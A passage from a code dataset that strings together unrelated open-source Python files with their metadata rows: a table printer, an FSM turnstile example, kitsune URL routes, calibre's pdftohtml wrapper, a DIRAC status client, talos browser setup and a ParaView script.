self.Table[tableName].append(rowAttribute)
def getTable(self):
''' return a table '''
return self.Table
def findAttribInWhichTable(self, attribName):
result=[]
for key in self.Table:
if attribName in self.Table[key][0]:
result.append(key)
return result
def isTable(self, tableName):
''' check the existence of tableName'''
return tableName in self.Table
def outputTable(self, table):
''' table is a list '''
outputString=''
#dynamic to adjust the alignment?
Alignment = '{:^20}'
isFirstColumn = True
if table == []:
return 'NULL'
order = table[0].keys()
for columnName in order:
if isFirstColumn:
outputString += Alignment.format(columnName)
isFirstColumn = False
else:
outputString += Alignment.format(columnName)
outputString += '\n'
isFirstColumn =True
for data in table:
for attrib in order:
if isFirstColumn:
outputString += Alignment.format(data[attrib])
isFirstColumn = False
else:
outputString += Alignment.format(data[attrib])
isFirstColumn = True
outputString += '\n'
return outputString
|
gpl-2.0
| 2,119,482,450,881,611,800
| 23.950495
| 102
| 0.658333
| false
| 3.214286
| false
| false
| false
|
DarkDruiD/Machinery
|
Python/Machinery/example.py
|
1
|
1470
|
import time
import random
from datapath import Datapath
from controller import Delta
from controller import State
from controller import FSMD
def locked_on_enter():
print "Entered locked state"
time.sleep(3)
def locked_on_leave():
pass
locked = State("locked")
locked.on_enter = locked_on_enter
locked.on_leave = locked_on_leave
def unlocked_on_enter():
print "Entered unlocked state"
time.sleep(3)
def unlocked_on_leave():
pass
unlocked = State("unlocked")
unlocked.on_enter = unlocked_on_enter
unlocked.on_leave = unlocked_on_leave
datapath = Datapath()
def read_coin_function():
return random.randint(0, 1)
datapath.add_variable("coin", read_coin_function)
def read_push_function():
return random.randint(0, 1)
datapath.add_variable("push", read_push_function)
state_table = Delta()
def when_pushed(dp):
if dp.get_variable("push"):
return True
return False
state_table.add_transition(
locked,
locked,
when_pushed,
None
)
def when_coined(dp):
if dp.get_variable("coin"):
return True
return False
state_table.add_transition(
locked,
unlocked,
when_coined,
None
)
state_table.add_transition(
unlocked,
unlocked,
when_coined,
None
)
state_table.add_transition(
unlocked,
locked,
when_pushed,
None
)
states = (
locked,
unlocked
)
fmsd = FSMD(states, datapath, state_table, locked)
fmsd.run()
|
mit
| -3,953,514,065,446,916,000
| 12.125
| 50
| 0.669388
| false
| 3.230769
| false
| false
| false
|
anushbmx/kitsune
|
kitsune/users/urls.py
|
1
|
4192
|
from django.conf import settings
from django.conf.urls import include, url
from django.views.decorators.cache import never_cache
from mozilla_django_oidc.views import OIDCAuthenticationCallbackView
import kitsune.flagit.views
from kitsune.sumo.views import redirect_to
from kitsune.users import api, views
from kitsune.users.models import Profile
# API patterns. All start with /users/api.
api_patterns = [
url(r'^usernames', api.usernames, name='users.api.usernames'),
]
# These will all start with /user/<user_id>/
detail_patterns = [
url(r'^$', views.profile, name='users.profile'),
url(r'^/documents$', views.documents_contributed, name='users.documents'),
url(r'^/edit$', views.edit_profile, name='users.edit_profile'),
# TODO:
# url('^abuse', views.report_abuse, name='users.abuse'),
]
users_patterns = [
url(r'^/auth$', views.user_auth, name='users.auth'),
url(r'^/login$', views.login, name='users.login'),
url(r'^/logout$', views.logout, name='users.logout'),
url(r'^/close_account$', views.close_account, name='users.close_account'),
url(r'^/activate/(?P<activation_key>\w+)$', views.activate,
name='users.old_activate'),
url(r'^/activate/(?P<user_id>\d+)/(?P<activation_key>\w+)$',
views.activate, name='users.activate'),
url(r'^/edit$', views.edit_profile, name='users.edit_my_profile'),
url(r'^/settings$', views.edit_settings, name='users.edit_settings'),
url(r'^/watches$', views.edit_watch_list, name='users.edit_watch_list'),
url(r'^/avatar$', views.edit_avatar, name='users.edit_avatar'),
url(r'^/avatar/delete$', views.delete_avatar, name='users.delete_avatar'),
url(r'^/deactivate$', views.deactivate, name='users.deactivate'),
url(r'^/deactivate-spam$', views.deactivate, {'mark_spam': True},
name='users.deactivate-spam'),
url(r'^/deactivation_log$', views.deactivation_log,
name='users.deactivation_log'),
url(r'^/make_contributor$', views.make_contributor,
name='users.make_contributor'),
# Password reset
url(r'^/pwreset$', views.password_reset, name='users.pw_reset'),
url(r'^/pwresetsent$', views.password_reset_sent,
name='users.pw_reset_sent'),
url(r'^/pwreset/(?P<uidb36>[-\w]+)/(?P<token>[-\w]+)$',
views.password_reset_confirm, name="users.pw_reset_confirm"),
url(r'^/pwresetcomplete$', views.password_reset_complete,
name="users.pw_reset_complete"),
# Forgot username
url(r'^/forgot-username$', views.forgot_username,
name='users.forgot_username'),
# Change password
url(r'^/pwchange$', views.password_change, name='users.pw_change'),
url(r'^/pwchangecomplete$', views.password_change_complete,
name='users.pw_change_complete'),
url(r'^/resendconfirmation$', views.resend_confirmation,
name='users.resend_confirmation'),
# Change email
url(r'^change_email$', redirect_to, {'url': 'users.change_email'},
name='users.old_change_email'),
url(r'^confirm_email/(?P<activation_key>\w+)$',
redirect_to, {'url': 'users.confirm_email'},
name='users.old_confirm_email'),
url(r'^/change_email$', views.change_email, name='users.change_email'),
url(r'^/confirm_email/(?P<activation_key>\w+)$',
views.confirm_change_email, name='users.confirm_email'),
url(r'^/api/', include(api_patterns)),
]
urlpatterns = [
# URLs for a single user.
url(r'^user/(?P<username>[\w@\.\s+-]+)', include(detail_patterns)),
url(r'^user/(?P<object_id>\w+)/flag$', kitsune.flagit.views.flag,
{'model': Profile}, name='users.flag'),
url(r'^users', include(users_patterns)),
]
if settings.OIDC_ENABLE:
urlpatterns += [
url(r'^fxa/callback/$', never_cache(OIDCAuthenticationCallbackView.as_view()),
name='users.fxa_authentication_callback'),
url(r'^fxa/authenticate/$', never_cache(views.FXAAuthenticateView.as_view()),
name='users.fxa_authentication_init'),
url(r'^fxa/logout/$', never_cache(views.FXALogoutView.as_view()),
name='users.fxa_logout_url'),
url(r'^oidc/', include('mozilla_django_oidc.urls')),
]
|
bsd-3-clause
| 7,517,170,160,506,751,000
| 40.098039
| 86
| 0.649332
| false
| 3.303388
| false
| false
| false
|
jelly/calibre
|
src/calibre/ebooks/pdf/pdftohtml.py
|
1
|
6990
|
# -*- coding: utf-8 -*-
__license__ = 'GPL 3'
__copyright__ = '2008, Kovid Goyal <kovid at kovidgoyal.net>, ' \
'2009, John Schember <john@nachtimwald.com>'
__docformat__ = 'restructuredtext en'
import errno, os, sys, subprocess, shutil, re
from functools import partial
from calibre.ebooks import ConversionError, DRMError
from calibre.ebooks.chardet import xml_to_unicode
from calibre.ptempfile import PersistentTemporaryFile
from calibre.constants import (isosx, iswindows, islinux, isbsd,
filesystem_encoding)
from calibre import CurrentDir
from calibre.utils.cleantext import clean_xml_chars
PDFTOHTML = 'pdftohtml'
popen = subprocess.Popen
if isosx and hasattr(sys, 'frameworks_dir'):
PDFTOHTML = os.path.join(getattr(sys, 'frameworks_dir'), PDFTOHTML)
if iswindows and hasattr(sys, 'frozen'):
base = sys.extensions_location if hasattr(sys, 'new_app_layout') else os.path.dirname(sys.executable)
PDFTOHTML = os.path.join(base, 'pdftohtml.exe')
popen = partial(subprocess.Popen, creationflags=0x08) # CREATE_NO_WINDOW=0x08 so that no ugly console is popped up
if (islinux or isbsd) and getattr(sys, 'frozen', False):
PDFTOHTML = os.path.join(sys.executables_location, 'bin', 'pdftohtml')
def pdftohtml(output_dir, pdf_path, no_images, as_xml=False):
'''
Convert the pdf into html using the pdftohtml app.
This will write the html as index.html into output_dir.
It will also write all extracted images to the output_dir
'''
pdfsrc = os.path.join(output_dir, u'src.pdf')
index = os.path.join(output_dir, u'index.'+('xml' if as_xml else 'html'))
with open(pdf_path, 'rb') as src, open(pdfsrc, 'wb') as dest:
shutil.copyfileobj(src, dest)
with CurrentDir(output_dir):
# This is necessary as pdftohtml doesn't always (linux) respect
# absolute paths. Also, it allows us to safely pass only bytestring
# arguments to subprocess on widows
# subprocess in python 2 cannot handle unicode arguments on windows
# that cannot be encoded with mbcs. Ensure all args are
# bytestrings.
def a(x):
return os.path.basename(x).encode('ascii')
exe = PDFTOHTML.encode(filesystem_encoding) if isinstance(PDFTOHTML,
unicode) else PDFTOHTML
cmd = [exe, b'-enc', b'UTF-8', b'-noframes', b'-p', b'-nomerge',
b'-nodrm', a(pdfsrc), a(index)]
if isbsd:
cmd.remove(b'-nodrm')
if no_images:
cmd.append(b'-i')
if as_xml:
cmd.append('-xml')
logf = PersistentTemporaryFile(u'pdftohtml_log')
try:
p = popen(cmd, stderr=logf._fd, stdout=logf._fd,
stdin=subprocess.PIPE)
except OSError as err:
if err.errno == errno.ENOENT:
raise ConversionError(
_('Could not find pdftohtml, check it is in your PATH'))
else:
raise
while True:
try:
ret = p.wait()
break
except OSError as e:
if e.errno == errno.EINTR:
continue
else:
raise
logf.flush()
logf.close()
out = open(logf.name, 'rb').read().strip()
if ret != 0:
raise ConversionError(b'pdftohtml failed with return code: %d\n%s' % (ret, out))
if out:
print "pdftohtml log:"
print out
if not os.path.exists(index) or os.stat(index).st_size < 100:
raise DRMError()
if not as_xml:
with lopen(index, 'r+b') as i:
raw = i.read()
raw = flip_images(raw)
raw = '<!-- created by calibre\'s pdftohtml -->\n' + raw
i.seek(0)
i.truncate()
# versions of pdftohtml >= 0.20 output self closing <br> tags, this
# breaks the pdf heuristics regexps, so replace them
raw = raw.replace(b'<br/>', b'<br>')
raw = re.sub(br'<a\s+name=(\d+)', br'<a id="\1"', raw, flags=re.I)
raw = re.sub(br'<a id="(\d+)"', br'<a id="p\1"', raw, flags=re.I)
raw = re.sub(br'<a href="index.html#(\d+)"', br'<a href="#p\1"', raw, flags=re.I)
i.write(raw)
cmd = [exe, b'-f', b'1', '-l', '1', b'-xml', b'-i', b'-enc', b'UTF-8', b'-noframes', b'-p', b'-nomerge',
b'-nodrm', b'-q', b'-stdout', a(pdfsrc)]
p = popen(cmd, stdout=subprocess.PIPE)
raw = p.stdout.read().strip()
if p.wait() == 0 and raw:
parse_outline(raw, output_dir)
if isbsd:
cmd.remove(b'-nodrm')
try:
os.remove(pdfsrc)
except:
pass
def parse_outline(raw, output_dir):
from lxml import etree
from calibre.ebooks.oeb.parse_utils import RECOVER_PARSER
raw = clean_xml_chars(xml_to_unicode(raw, strip_encoding_pats=True, assume_utf8=True)[0])
outline = etree.fromstring(raw, parser=RECOVER_PARSER).xpath('(//outline)[1]')
if outline:
from calibre.ebooks.oeb.polish.toc import TOC, create_ncx
outline = outline[0]
toc = TOC()
count = [0]
def process_node(node, toc):
for child in node.iterdescendants('*'):
if child.tag == 'outline':
parent = toc.children[-1] if toc.children else toc
process_node(child, parent)
else:
page = child.get('page', '1')
toc.add(child.text, 'index.html', 'p' + page)
count[0] += 1
process_node(outline, toc)
if count[0] > 2:
root = create_ncx(toc, (lambda x:x), 'pdftohtml', 'en', 'pdftohtml')
with open(os.path.join(output_dir, 'toc.ncx'), 'wb') as f:
f.write(etree.tostring(root, pretty_print=True, with_tail=False, encoding='utf-8', xml_declaration=True))
def flip_image(img, flip):
from calibre.utils.img import flip_image, image_and_format_from_data, image_to_data
with lopen(img, 'r+b') as f:
img, fmt = image_and_format_from_data(f.read())
img = flip_image(img, horizontal=b'x' in flip, vertical=b'y' in flip)
f.seek(0), f.truncate()
f.write(image_to_data(img, fmt=fmt))
def flip_images(raw):
for match in re.finditer(b'<IMG[^>]+/?>', raw, flags=re.I):
img = match.group()
m = re.search(br'class="(x|y|xy)flip"', img)
if m is None:
continue
flip = m.group(1)
src = re.search(br'src="([^"]+)"', img)
if src is None:
continue
img = src.group(1)
if not os.path.exists(img):
continue
flip_image(img, flip)
raw = re.sub(br'<STYLE.+?</STYLE>\s*', b'', raw, flags=re.I|re.DOTALL)
return raw
|
gpl-3.0
| 4,022,858,997,273,561,000
| 37.406593
| 121
| 0.558798
| false
| 3.484546
| false
| false
| false
|
chaen/DIRAC
|
ResourceStatusSystem/Client/ResourceStatusClient.py
|
1
|
14924
|
''' ResourceStatusClient
Client to interact with the ResourceStatusDB.
'''
# pylint: disable=unused-argument
__RCSID__ = '$Id$'
from DIRAC import S_OK
from DIRAC.Core.Base.Client import Client
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations
from DIRAC.FrameworkSystem.Client.NotificationClient import NotificationClient
from DIRAC.ResourceStatusSystem.Client.ResourceManagementClient import uppercase_first_letter
class ResourceStatusClient(Client):
"""
The :class:`ResourceStatusClient` class exposes the :mod:`DIRAC.ResourceStatus`
API. All functions you need are on this client.
You can use this client on this way
>>> from DIRAC.ResourceStatusSystem.Client.ResourceStatusClient import ResourceStatusClient
>>> rsClient = ResourceStatusClient()
"""
def __init__(self, **kwargs):
super(ResourceStatusClient, self).__init__(**kwargs)
self.setServer('ResourceStatus/ResourceStatus')
def _prepare(self, sendDict):
# remove unnecessary key generated by locals()
del sendDict['self']
del sendDict['element']
del sendDict['tableType']
# make each key name uppercase to match database column names (case sensitive)
for key, value in sendDict.items():
del sendDict[key]
if value:
sendDict.update({uppercase_first_letter(key): value})
return sendDict
def insert(self, tableName, record):
"""
Insert a dictionary `record` as a row in table `tableName`
:param str tableName: the name of the table
:param dict record: dictionary of record to insert in the table
:return: S_OK() || S_ERROR()
"""
return self._getRPC().insert(tableName, record)
def select(self, tableName, params=None):
"""
Select rows from the table `tableName`
:param str tableName: the name of the table
:param dict record: dictionary of the selection parameters
:return: S_OK() || S_ERROR()
"""
if params is None:
params = {}
return self._getRPC().select(tableName, params)
def delete(self, tableName, params=None):
"""
Delect rows from the table `tableName`
:param str tableName: the name of the table
:param dict record: dictionary of the deletion parameters
:Returns:
S_OK() || S_ERROR()
"""
if params is None:
params = {}
return self._getRPC().delete(tableName, params)
################################################################################
# Element status methods - enjoy !
def insertStatusElement(self, element, tableType, name, statusType, status,
elementType, reason, dateEffective, lastCheckTime,
tokenOwner, tokenExpiration=None):
'''
Inserts on <element><tableType> a new row with the arguments given.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
time-stamp setting last time the status & status were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().insert(element + tableType, self._prepare(locals()))
def selectStatusElement(self, element, tableType, name=None, statusType=None,
status=None, elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None, meta=None):
'''
Gets from <element><tableType> all rows that match the parameters given.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `[, string, list]`
name of the individual of class element
**statusType** - `[, string, list]`
it has to be a valid status type for the element class
**status** - `[, string, list]`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `[, string, list]`
column to distinguish between the different elements in the same element
table.
**reason** - `[, string, list]`
decision that triggered the assigned status
**dateEffective** - `[, datetime, list]`
time-stamp from which the status & status type are effective
**lastCheckTime** - `[, datetime, list]`
time-stamp setting last time the status & status were checked
**tokenOwner** - `[, string, list]`
token assigned to the site & status type
**tokenExpiration** - `[, datetime, list]`
time-stamp setting validity of token ownership
**meta** - `dict`
metadata for the mysql query. Currently it is being used only for column selection.
For example: meta = { 'columns' : [ 'Name' ] } will return only the 'Name' column.
:return: S_OK() || S_ERROR()
'''
return self._getRPC().select(element + tableType, self._prepare(locals()))
def deleteStatusElement(self, element, tableType, name=None, statusType=None,
status=None, elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None, meta=None):
'''
Deletes from <element><tableType> all rows that match the parameters given.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `[, string, list]`
name of the individual of class element
**statusType** - `[, string, list]`
it has to be a valid status type for the element class
**status** - `[, string, list]`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `[, string, list]`
column to distinguish between the different elements in the same element
table.
**reason** - `[, string, list]`
decision that triggered the assigned status
**dateEffective** - `[, datetime, list]`
time-stamp from which the status & status type are effective
**lastCheckTime** - `[, datetime, list]`
time-stamp setting last time the status & status were checked
**tokenOwner** - `[, string, list]`
token assigned to the site & status type
**tokenExpiration** - `[, datetime, list]`
time-stamp setting validity of token ownership
**meta** - `dict`
metadata for the mysql query
:return: S_OK() || S_ERROR()
'''
return self._getRPC().delete(element + tableType, self._prepare(locals()))
def addOrModifyStatusElement(self, element, tableType, name=None,
statusType=None, status=None,
elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None):
'''
Adds or updates-if-duplicated from <element><tableType> and also adds a log
if flag is active.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
time-stamp setting last time the status & status were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().addOrModify(element + tableType, self._prepare(locals()))
def modifyStatusElement(self, element, tableType, name=None, statusType=None,
status=None, elementType=None, reason=None,
dateEffective=None, lastCheckTime=None, tokenOwner=None,
tokenExpiration=None):
'''
Updates from <element><tableType> and also adds a log if flag is active.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
time-stamp setting last time the status & status were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().addOrModify(element + tableType, self._prepare(locals()))
def addIfNotThereStatusElement(self, element, tableType, name=None,
statusType=None, status=None,
elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None):
'''
Adds if-not-duplicated from <element><tableType> and also adds a log if flag
is active.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
time-stamp setting last time the status & status were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().addIfNotThere(element + tableType, self._prepare(locals()))
##############################################################################
# Protected methods - Use carefully !!
def notify(self, request, params):
''' Send notification for a given request with its params to the diracAdmin
'''
address = Operations().getValue('ResourceStatus/Notification/DebugGroup/Users')
msg = 'Matching parameters: ' + str(params)
sbj = '[NOTIFICATION] DIRAC ResourceStatusDB: ' + request + ' entry'
NotificationClient().sendMail(address, sbj, msg, address)
def _extermineStatusElement(self, element, name, keepLogs=True):
'''
Deletes from <element>Status,
<element>History
<element>Log
all rows with `elementName`. It removes all the entries, logs, etc..
Use with common sense !
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElements ), any of the defaults: \
`Site` | `Resource` | `Node`
**name** - `[, string, list]`
name of the individual of class element
**keepLogs** - `bool`
if active, logs are kept in the database
:return: S_OK() || S_ERROR()
'''
return self.__extermineStatusElement(element, name, keepLogs)
def __extermineStatusElement(self, element, name, keepLogs):
'''
This method iterates over the three ( or four ) table types - depending
on the value of keepLogs - deleting all matches of `name`.
'''
tableTypes = ['Status', 'History']
if keepLogs is False:
tableTypes.append('Log')
for table in tableTypes:
deleteQuery = self.deleteStatusElement(element, table, name=name)
if not deleteQuery['OK']:
return deleteQuery
return S_OK()
################################################################################
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF
|
gpl-3.0
| -4,775,719,922,118,156,000
| 38.170604
| 94
| 0.607679
| false
| 4.267658
| false
| false
| false
|
cstipkovic/spidermonkey-research
|
testing/talos/talos/ffsetup.py
|
1
|
6208
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
Set up a browser environment before running a test.
"""
import os
import re
import tempfile
import mozfile
from mozprocess import ProcessHandler
from mozprofile.profile import Profile
from mozlog import get_proxy_logger
from talos import utils
from talos.utils import TalosError
from talos.sps_profile import SpsProfile
LOG = get_proxy_logger()
class FFSetup(object):
"""
Initialize the browser environment before running a test.
This prepares:
- the environment vars for running the test in the browser,
available via the instance member *env*.
- the profile used to run the test, available via the
instance member *profile_dir*.
- sps profiling, available via the instance member *sps_profile*
of type :class:`SpsProfile` or None if not used.
Note that the browser will be run once with the profile, to ensure
this is basically working and negate any performance noise with the
real test run (installing the profile the first time takes time).
This class should be used as a context manager::
with FFSetup(browser_config, test_config) as setup:
# setup.env is initialized, and setup.profile_dir created
pass
# here the profile is removed
"""
PROFILE_REGEX = re.compile('__metrics(.*)__metrics',
re.DOTALL | re.MULTILINE)
def __init__(self, browser_config, test_config):
self.browser_config, self.test_config = browser_config, test_config
self._tmp_dir = tempfile.mkdtemp()
self.env = None
# The profile dir must be named 'profile' because of xperf analysis
# (in etlparser.py). TODO fix that ?
self.profile_dir = os.path.join(self._tmp_dir, 'profile')
self.sps_profile = None
def _init_env(self):
self.env = dict(os.environ)
for k, v in self.browser_config['env'].iteritems():
self.env[k] = str(v)
self.env['MOZ_CRASHREPORTER_NO_REPORT'] = '1'
# for winxp e10s logging:
# https://bugzilla.mozilla.org/show_bug.cgi?id=1037445
self.env['MOZ_WIN_INHERIT_STD_HANDLES_PRE_VISTA'] = '1'
if self.browser_config['symbols_path']:
self.env['MOZ_CRASHREPORTER'] = '1'
else:
self.env['MOZ_CRASHREPORTER_DISABLE'] = '1'
self.env['MOZ_DISABLE_NONLOCAL_CONNECTIONS'] = '1'
self.env["LD_LIBRARY_PATH"] = \
os.path.dirname(self.browser_config['browser_path'])
def _init_profile(self):
preferences = dict(self.browser_config['preferences'])
if self.test_config.get('preferences'):
test_prefs = dict(
[(i, utils.parse_pref(j))
for i, j in self.test_config['preferences'].items()]
)
preferences.update(test_prefs)
# interpolate webserver value in prefs
webserver = self.browser_config['webserver']
if '://' not in webserver:
webserver = 'http://' + webserver
for name, value in preferences.items():
if type(value) is str:
value = utils.interpolate(value, webserver=webserver)
preferences[name] = value
extensions = self.browser_config['extensions'][:]
if self.test_config.get('extensions'):
extensions.append(self.test_config['extensions'])
if self.browser_config['develop'] or \
self.browser_config['branch_name'] == 'Try':
extensions = [os.path.dirname(i) for i in extensions]
profile = Profile.clone(
os.path.normpath(self.test_config['profile_path']),
self.profile_dir,
restore=False)
profile.set_preferences(preferences)
profile.addon_manager.install_addons(extensions)
def _run_profile(self):
command_args = utils.GenerateBrowserCommandLine(
self.browser_config["browser_path"],
self.browser_config["extra_args"],
self.profile_dir,
self.browser_config["init_url"]
)
def browser_log(line):
LOG.process_output(browser.pid, line)
browser = ProcessHandler(command_args, env=self.env,
processOutputLine=browser_log)
browser.run()
LOG.process_start(browser.pid, ' '.join(command_args))
try:
exit_code = browser.wait()
except KeyboardInterrupt:
browser.kill()
raise
LOG.process_exit(browser.pid, exit_code)
results_raw = '\n'.join(browser.output)
if not self.PROFILE_REGEX.search(results_raw):
LOG.info("Could not find %s in browser output"
% self.PROFILE_REGEX.pattern)
LOG.info("Raw results:%s" % results_raw)
raise TalosError("browser failed to close after being initialized")
def _init_sps_profile(self):
upload_dir = os.getenv('MOZ_UPLOAD_DIR')
if self.test_config.get('sps_profile') and not upload_dir:
LOG.critical("Profiling ignored because MOZ_UPLOAD_DIR was not"
" set")
if upload_dir and self.test_config.get('sps_profile'):
self.sps_profile = SpsProfile(upload_dir,
self.browser_config,
self.test_config)
self.sps_profile.update_env(self.env)
def clean(self):
mozfile.remove(self._tmp_dir)
if self.sps_profile:
self.sps_profile.clean()
def __enter__(self):
LOG.info('Initialising browser for %s test...'
% self.test_config['name'])
self._init_env()
self._init_profile()
try:
self._run_profile()
except:
self.clean()
raise
self._init_sps_profile()
LOG.info('Browser initialized.')
return self
def __exit__(self, type, value, tb):
self.clean()
|
mpl-2.0
| 83,377,925,997,244,750
| 34.678161
| 79
| 0.597777
| false
| 3.989717
| true
| false
| false
|
jasonfleming/asgs
|
output/paraviewBathyWSE.py
|
1
|
7106
|
#!/usr/bin/env python
#----------------------------------------------------------------------
# paraviewBathyWSE.py : Visualize bathy and wse simultaneously in
# Paraview.
#----------------------------------------------------------------------
# Copyright(C) 2016 Jason Fleming
#
# This file is part of the ADCIRC Surge Guidance System (ASGS).
#
# The ASGS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ASGS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the ASGS. If not, see <http://www.gnu.org/licenses/>.
#----------------------------------------------------------------------
from optparse import OptionParser
try: paraview.simple
except: from paraview.simple import *
paraview.simple._DisableFirstRenderCameraReset()
# C O M M A N D L I N E O P T I O N S
parser = OptionParser()
#parser.add_option("-i", "--interact", dest="interact", default=False,
# action="store_true", help="to enable interaction with data")
#parser.add_option("-o", "--outline", dest="outline", default=False,
# action="store_true", help="to display mesh outline")
parser.add_option("-f", "--frame", dest="frame", default=1,
help="frame to render")
parser.add_option("-m", "--magnification", dest="magnification", default=1,
help="magnification of output image (integer)")
#parser.add_option("-a", "--annotation", dest="annotation", default="null",
# help="text to place in frame")
(options, args) = parser.parse_args()
# R E A D D A T A
fort_63_nc_xmf = XDMFReader( FileName='/home/jason/projects/UNC-ASGS/2016/TableTop/08/nhcConsensus/fort.63.nc.xmf' )
fort_63_nc_xmf.PointArrays = ['sea_surface_height_above_geoid', 'BathymetricDepth']
# W A T E R S U R F A C E E L E V A T I O N
# set coloring for water surface elevation to ERDC rainbow (dark)
wseColorBar_PVLookupTable = GetLookupTableForArray( "sea_surface_height_above_geoid", 1, RGBPoints=[0.0, 0.0, 0.0, 0.423499, 0.6688949999999999, 0.0, 0.119341, 0.529244, 1.3377949999999998, 0.0, 0.238697, 0.634974, 2.00669, 0.0, 0.346853, 0.687877, 2.675585, 0.0, 0.450217, 0.718135, 3.34448, 0.0, 0.553552, 0.664836, 4.01338, 0.0, 0.651087, 0.51931, 4.682274, 0.115846, 0.724788, 0.35285, 5.3511705, 0.326772, 0.781201, 0.140185, 6.020065, 0.522759, 0.79852, 0.0284581, 6.688965, 0.703166, 0.788678, 0.00885023, 7.35786, 0.845121, 0.751141, 0.0, 8.026755, 0.955734, 0.690822, 0.0, 8.69565, 0.995407, 0.56791, 0.0618448, 9.36455, 0.987716, 0.403403, 0.164858, 10.0, 0.980407, 0.247105, 0.262699], VectorMode='Magnitude', NanColor=[0.498039, 0.0, 0.0], ColorSpace = 'Lab', ScalarRangeInitialized=1.0 )
wseColorBar_PiecewiseFunction = CreatePiecewiseFunction( Points=[0.0, 0.0, 0.5, 0.0, 10.0, 1.0, 0.5, 0.0] )
wseColorBar_PVLookupTable.ScalarOpacityFunction = wseColorBar_PiecewiseFunction
wseColorBar_PVLookupTable.LockScalarRange = 1
# use threshold filter to elimitate the -99999 values from the water
# surface elevation data
SetActiveSource(fort_63_nc_xmf) # start building the pipeline from the reader
Threshold1 = Threshold()
Threshold1.ThresholdRange = [-99998.0, 100.0]
Threshold1.Scalars = ['POINTS', 'sea_surface_height_above_geoid']
WarpByScalar1 = WarpByScalar()
WarpByScalar1.Scalars = ['POINTS', 'sea_surface_height_above_geoid']
WarpByScalar1.ScaleFactor = 0.0002
DataRepresentation1 = Show()
DataRepresentation1.ColorArrayName = ('POINT_DATA', 'sea_surface_height_above_geoid')
DataRepresentation1.ScalarOpacityFunction = wseColorBar_PiecewiseFunction
DataRepresentation1.LookupTable = wseColorBar_PVLookupTable
# B A T H Y M E T R Y / T O P O G R A P H Y
# need to remove dry areas that are below msl from the visualization
# otherwise they will show up blue in the visualization and look like
# they are underwater
